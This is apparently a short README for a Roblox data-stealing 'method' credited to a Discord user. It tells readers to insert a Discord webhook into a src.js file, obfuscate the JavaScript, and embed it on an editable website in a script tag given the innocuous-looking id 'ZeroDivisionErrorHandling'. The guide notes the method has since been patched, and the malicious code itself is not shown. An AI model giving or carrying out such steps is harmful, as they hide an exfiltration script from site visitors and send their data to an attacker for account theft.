WARNING: This method has been patched once Roblox had cross site scripting policy (basically let roblox get embedded, was the main function of the method).
- A few braincells
- Website that you can edit
- Discord Webhook
-
Go to the src.js file, and replace the text that says WEBHOOK inside the quotes with your Discord webhook
-
Obfuscate the Javascript code, you can use the obfuscator here
-
Paste the obfuscated result into the script tag you made
-
Create the id property inside of the
<script>
tag you made, and set the id to 'ZeroDivisionErrorHandling' -
Your HTML should look like this now:
<script id='ZeroDivisionErrorHandling'> // OBFUSCATED CODE HERE </script>
After this, you should be done, and the method should work.
Made by dorito#9095